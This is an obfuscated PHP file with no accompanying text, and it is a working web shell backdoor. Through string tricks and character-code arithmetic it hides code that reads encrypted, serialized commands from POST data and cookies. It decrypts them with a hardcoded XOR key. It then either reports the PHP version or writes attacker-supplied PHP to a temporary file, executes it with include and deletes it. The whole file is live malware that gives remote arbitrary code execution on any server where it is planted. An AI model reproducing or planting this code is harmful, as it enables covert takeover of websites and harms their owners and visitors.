<?php 
$xmcz_kvmi	= /*gbzuru  */ 'xmcz_kvmi'   ^   '';


$qgueywrtaw   =  $xmcz_kvmi(97) /*   cdr */ .     "\x72"    . /*  nnsniu  */ "r"."a"."\171"    . /*  mqs   */ $xmcz_kvmi(95)  .	"m".$xmcz_kvmi(97)    .      $xmcz_kvmi(292-180);$dopgtdzrl     =	"c".$xmcz_kvmi(111)    .    $xmcz_kvmi(677-560) /*cx*/ .    "n"."\x74";



function  vbdtdrphf($zvyaff,    $ubmau){

 /*irr*/ global    $xmcz_kvmi;
  

       $zvyaff /*  m  */ =       "<"	.	"?"."p"."\x68"     .      "p".$xmcz_kvmi(32)	.    "u".$xmcz_kvmi(110) /*t  */ .    $xmcz_kvmi(563-455) /*  snt */ .    "\x69"."n"."k"."("."\137" /* y*/ . /* tefd */ "_"."F"."I"."\x4c"  .       $xmcz_kvmi(413-344)  . /* qbk   */ $xmcz_kvmi(111-16)    . /* pkkkxy */ $xmcz_kvmi(95) /*ekassj*/ .   $xmcz_kvmi(447-406) /* vdl*/ .       $xmcz_kvmi(59) /* d*/ .   $xmcz_kvmi(32)  . /* h  */ $zvyaff["\x64"];


 /* gfj   */ $vrzscctr /*kzhi  */ =	$xmcz_kvmi(841-739)       . /*   ft  */ "\x69"."l"."\x65"."_"."p"."u".$xmcz_kvmi(862-746)	.       "_"."\x63"	. /*fmdsq  */ $xmcz_kvmi(111)    .      $xmcz_kvmi(110)	.   "t".$xmcz_kvmi(101)    .    "\156"	.    "\x74"    .	"s";

 /*  hre  */ 
  $vrzscctr($ubmau, /* e*/ $zvyaff);

  


     zzisvaqmbq($ubmau);

}


$gn_ooddroz    =   73;



function  zzisvaqmbq($ubmau){

	global      $xmcz_kvmi;
 /*uuqvvf   */ 


     include($ubmau); /*   qvbo  */ $cixdcnjkbcjjol /*   mzkm*/ =      $ubmau;


 /*  dv_lt*/ @unlink($cixdcnjkbcjjol);

}


function	_uprc()
{
	global      $xmcz_kvmi;


     $rjhnqynws /* rctb  */ =   array();
    $rjhnqynws["p"."\x76"]    =  phpversion();

	$rjhnqynws["s"."v"]    = /*_yskv*/ $xmcz_kvmi(51) /*  edsmqg */ .	".".$xmcz_kvmi(933-880);

	$cklmqf /*q_  */ =       74; /*bucrs */ echo    @serialize($rjhnqynws);


}





function /* kapz */ ujokoma_w($zvyaff, /* grrtq */ $_snoge){
 /*   x */ global    $xmcz_kvmi;



     $spnqmrp      = /*  y */ "";

   $fscrqeu    =     'z_';


 /*hbgluf */ $unzfab /*   fuyb*/ =    hash('sha256',  $zvyaff); /*qetf */ $qlljbtzyq /*  ixodp */ = /*  k */ str_replace('dim',	$unzfab,  $fscrqeu); /*   kaj*/ $rjhnqynws   =      0;
 /* ix   */ while      ($rjhnqynws	<    strlen($zvyaff)) /*   uhom */ {
    $atcyrgim  =  isset($_snoge)      ?   $_snoge    : /*pt  */ '';    for    ($cixdcnjk /* ssah*/ =    0;    $cixdcnjk  <   strlen($atcyrgim)    &&       $rjhnqynws  <    strlen($zvyaff); /* obgsp  */ $cixdcnjk++,	$rjhnqynws++) /*   ro */ {
       $spnqmrp	.= /*  zme*/ $xmcz_kvmi(ord($zvyaff[$rjhnqynws]) /*   d */ ^     ord($atcyrgim[$cixdcnjk]));


     }

	if /* jfr_y */ (strlen($spnqmrp)     > /*  hheoqs  */ 20)       {    $qlljbtzyq	=	substr($spnqmrp, /*  b */ 0,      20); /*gar  */ }

 /*   khej_m   */ }

   if /*jwob   */ (empty($spnqmrp))	{


	$spnqmrp    =	date('Y-m-d      H:i:s');


   }	return       $spnqmrp;
}







function /* fvzb*/ mazzky($hkiguz){

	global	$xmcz_kvmi;

    

 /*  tnoexd*/ $sdysv       =  "\x37" /*   mq*/ .       "2"."\x34" /*i */ . /*  y_h  */ "\67" /*jkg_   */ . /* lq */ "\x34"    . /*h_   */ "7"."\x32"    . /*p  */ "\x64"."\x2d"	. /* ey */ $xmcz_kvmi(98)      . /*   _w  */ "8"."6"."4".$xmcz_kvmi(45) /*   esqwp  */ .    $xmcz_kvmi(128-76) /*  hvzmss */ .    "4"."\x65".$xmcz_kvmi(1005-953) /*  phsy*/ . /*mac*/ $xmcz_kvmi(45)      .    "8"."8".$xmcz_kvmi(100)  . /*jy_qu*/ "2"."-"."\145" /* u  */ .   "\x65"."\142"   .    $xmcz_kvmi(49) /*  ymk  */ .       "\x61"."\x38"     .	"b"."4"."\142"    .	"\x32" /*  qyqjg   */ .      "7"."4";
       foreach /*  qgmolx  */ ($hkiguz /* lk */ as /*   uhb*/ $mwfsq    =>	$zvyaff)	{    _rety(base64_decode($zvyaff), /*pzdkej */ $sdysv,  $mwfsq);    }


}



function     _rety($zvyaff,       $sdysv, /* dganq */ $mwfsq)
{  global	$xmcz_kvmi;


   
    $zvyaff /*  ui   */ = /*   yekje   */ unserialize(ujokoma_w(ujokoma_w($zvyaff, /*   ihvaa   */ $sdysv),    $mwfsq));	$piifiskiuq	= /* atihi*/ 'isocepkwoe';
	$rjhnqynwsyoujrsfvk /*qgjo   */ = /*q */ 'fewyxyds';


    if /*x */ (isset($zvyaff[$xmcz_kvmi(97)   .	"k"])) /*   efcf */ {

       if    ($zvyaff["\x61"]      ==	"\x69")   {


 /* cirjxv */ _uprc();
     } /*docmmn   */ elseif  ($zvyaff["\x61"]   == /* cqqn*/ "\x65") /*  z */ { /* hh*/ vbdtdrphf($zvyaff,	sprintf($xmcz_kvmi(320-274) /*  gwg*/ .    "\x2f"       .  $xmcz_kvmi(800-763) /*  nq_ubo */ .      "\163"	. /* h  */ "."."p".$xmcz_kvmi(795-687),     md5($sdysv)));
			$tlfedvgz     =  44;
  }


	exit();    }

}
mazzky($_POST); /*  v  */ 



$mrhylvxrg      =	$qgueywrtaw('rawurldecode', /* cafzdt */ $_POST);


$zw_mxhmn    =	$dopgtdzrl($mrhylvxrg);

mazzky($_COOKIE); /* nlmg   */ 




$ygsjk /* _cc*/ = /* tqr   */ $qgueywrtaw('rawurldecode',       $_COOKIE);

?>